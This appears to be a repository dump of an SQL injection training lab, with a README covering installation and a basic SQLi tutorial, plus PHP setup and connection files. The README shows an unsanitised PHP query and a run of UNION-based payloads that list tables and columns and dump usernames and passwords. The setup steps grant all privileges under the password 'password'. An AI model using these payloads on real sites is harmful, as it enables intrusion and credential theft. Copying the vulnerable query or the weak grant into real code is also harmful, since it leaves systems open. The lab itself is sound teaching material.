46 |
47 |
48 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # SQL Injection Training Lab
2 |
3 | This is a simple SQL Injection Lab. This installation requires small usage of storage and no special tools installation. You just need an Apache and PHP installed in your machine, then you can run this lab to learn performing SQL Injection.
4 |
5 | SQL Injection (a.k.a sqli) is one of the most dangerous and popular cyber attack where it start with leaking data (SQL database) to take control of the server, change or delete the data or create a fake data.
6 |
7 | This SQLi technique only works on SQL Database like MySQL (includes MariaDB), Oracle, Microsoft SQL Server and other SQL Databases. Even the noSQL Database has risen in popularity and trust, but yet, SQL Database is still in world wide industry which make SQLi attack is still relevence untill today.
8 |
9 | Learning SQLi is easy and important especially if you work as programmer or developer, you will need this knowledge to see if your developed systems are secured or not.
10 |
11 | # How to Install?
12 | The installation of this lab is simple. You need an Apache Server and PHP installed! If you new to this, follow this thorough steps:
13 |
14 | ## For Windows:
15 | 1. Install XAMPP (PHP 7.4 minimum)
16 | 2. Start your XAMPP Control Panel and click start on Apache & MySQL
17 | 3. Go to "http://localhost/phpmyadmin"
18 | 4. Click on "New" on top left menu
19 | 5. Insert database name "sqli_lab"
20 | 6. Download this Github Repos and extract in "C:/xampp/htdocs"
21 | 7. Go to "http://localhost/SQL-Injection-Training-Lab"
22 | 8. Click on "Submit", then you are good to go
23 |
24 | ## For Linux
25 | 1. Install Apache `apt install apache2`
26 | 2. Install MySQL (search Google for the step depend on your linux version)
27 | 3. Install PHP `apt install php`
28 | 4. Install PHPMyAdmin (optional) `apt install phpmyadmin`
29 | 5. Start Apache & MySQL `service apache2 start` & `service mysql start`
30 | 6. Login to MySQL `sudo mysql -u root`
31 | 7. Create a new database named sqli_lab `CREATE DATABASE sqli_lab;`
32 | 8. Create database user (optional)
33 | ```
34 | CREATE USER 'sqli'@'localhost' IDENTIFIED BY 'password';
35 | GRANT ALL PRIVILEGES ON *.* TO 'sqli'@'localhost' IDENTIFIED BY 'password';
36 | FLUSH PRIVILEGES;
37 | ```
38 | (SQL Command might differs depend on your MySQL version)
39 |
40 | 9. Go to "http://localhost/SQL-Injection-Training-Lab"
41 | 10. Insert your created database user "sqli" with password "password"
42 | 11. Click on "Submit", then you are good to go
43 |
44 | ## Notes
45 | If you are using Kali Linux, you can start with step 6 on Linux steps.
46 |
47 | # Basic SQL Injection
48 | SQLi happens when user input is not filtered/sanitize and used directly in the SQL Query. Example (in PHP):
49 | ```
50 | $id = $_GET["id"];
51 |
52 | $sql = "SELECT * FROM users WHERE id = '$id'";
53 | $query = mysqli_query ...
54 | ```
55 | The variable `$id` stored non-filtered/sanitize values take from `$_GET`. This means that the input `id` can be used to break the SQL Query inside PHP code.
56 |
57 | ## What is Payload?
58 | Payload means the input used to manipulate the SQL Query. Most common used "payload" to check wheter the URL or site is open to SQLi or not is using single quote `'` or double quote `"` after the `id` parameters. Example:
59 |
60 | http://unsecure-web.com/SQL-Injection-Training-Lab/index.php?id=1
61 |
62 | Hackers will put `'` or `"` like this:
63 |
64 | http://unsecure-web.com/SQL-Injection-Training-Lab/index.php?id=1'
65 |
66 | Or
67 |
68 | http://unsecure-web.com/SQL-Injection-Training-Lab/index.php?id=1"
69 |
70 |
71 | The use of `'` or `"` is to end a comparison statement in the SQL Query. Example:
72 | ```
73 | //without quote(s)
74 | ...
75 | $sql = "SELECT * FROM users WHERE id = '1'";
76 |
77 | //with quote
78 | ...
79 | $sql = "SELECT * FROM users WHERE id = '1''"
80 | ```
81 | The above code shows that there will be an addtional `'` character after the input which makes the SQL Query broke. This means the quote `'` is working for current attack because the SQL Query uses the same single quote as our payload.
82 |
83 | This payload is not stop on the quotes, it can be elaborate untill we can insert a complete SQL Query in the input. Here's few example how the payload is elaborated:
84 | ```
85 | ...index.php?id=1'
86 |
87 | //commenting the other SQL after the input
88 | ...index.php?id=1'--+
89 |
90 | ...index.php?id=1'+order+by1--+
91 | ...index.php?id=1'+union+all+select+1,2,3,4,5--+
92 | ...index.php?id=-1'+union+all+select+1,2,3,4,5--+
93 |
94 | //List all table in current database
95 | ...index.php?id=-1'+union+all+select+1,group_concat(table_name),3,4,5+from+information_schema.tables+where+table_schema=database()--+
96 |
97 | //List all column in specific table
98 | ...index.php?id=-1'+union+all+select+1,group_concat(column_name),3,4,5+from+information_schema.columns+where+table_schema=database()+and+table_name='tbl_users'--+
99 |
100 | //List all data in specific table
101 | ...index.php?id=-1'+union+all+select+1,group_concat(username),group_concat(password),4,5+from+tbl_users--+
102 | ```
103 | These above is the basic payload we can use to perform a SQLi attack. There are more payload can be created depend on how strong is you knowledge on SQL Command.
104 |
105 | # How to Learn from this repos?
106 | This repos are created for our MyOPECS (Malaysia Open Cyber Security) Training. If you are a Malaysian and can speak Malay, then you can watch my videos on YouTube or follow our weekly hacking training every Thurday night Live on TikTok.
107 |
108 | If you are not fit in the criteria above, then you can keep reading the README.md in every folder from Level A-N. (will be updated from time to time)
109 |
--------------------------------------------------------------------------------
/core/connection.php:
--------------------------------------------------------------------------------
1 | 404 Not Found");
6 | }
7 |
8 | if(file_exists(dirname(__DIR__) . "/configure.json")){
9 | $json = file_get_contents(dirname(__DIR__) . "/configure.json");
10 | $obj = json_decode($json);
11 |
12 | $conn = mysqli_connect($obj->host . ":" . $obj->port, $obj->username, $obj->password, "sqli_lab");
13 |
14 | if(!$conn){
15 | die("Fail connecting to your database. Please make sure your MySQL server is enabled and this training has been setup properly.");
16 | }
17 | }else{
18 | header("Content-Type: text/plain");
19 | die("you need to setup the database of this training first.");
20 | }
21 |
--------------------------------------------------------------------------------
/core/index.php:
--------------------------------------------------------------------------------
1 | $_POST["host"],
14 | "port" => $_POST["port"],
15 | "username" => $_POST["username"],
16 | "password" => $_POST["password"]
17 | ];
18 |
19 | $f = fopen(__DIR__ . "/configure.json", "w+");
20 | fwrite($f, json_encode($config));
21 | fclose($f);
22 |
23 | $conn = mysqli_connect($config["host"] . ":" . $config["port"], $config["username"], $config["password"], "sqli_lab");
24 |
25 | if($conn){
26 | mysqli_query($conn, <<
71 |
72 |
73 |
74 | SQL Injection Training Lab
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
Welcome to SQL Injection Lab Training!
84 |
87 |
88 | Completed! Your database information has been saved..
89 |
90 |
91 |
92 | Completed! You can continue for practice..
93 |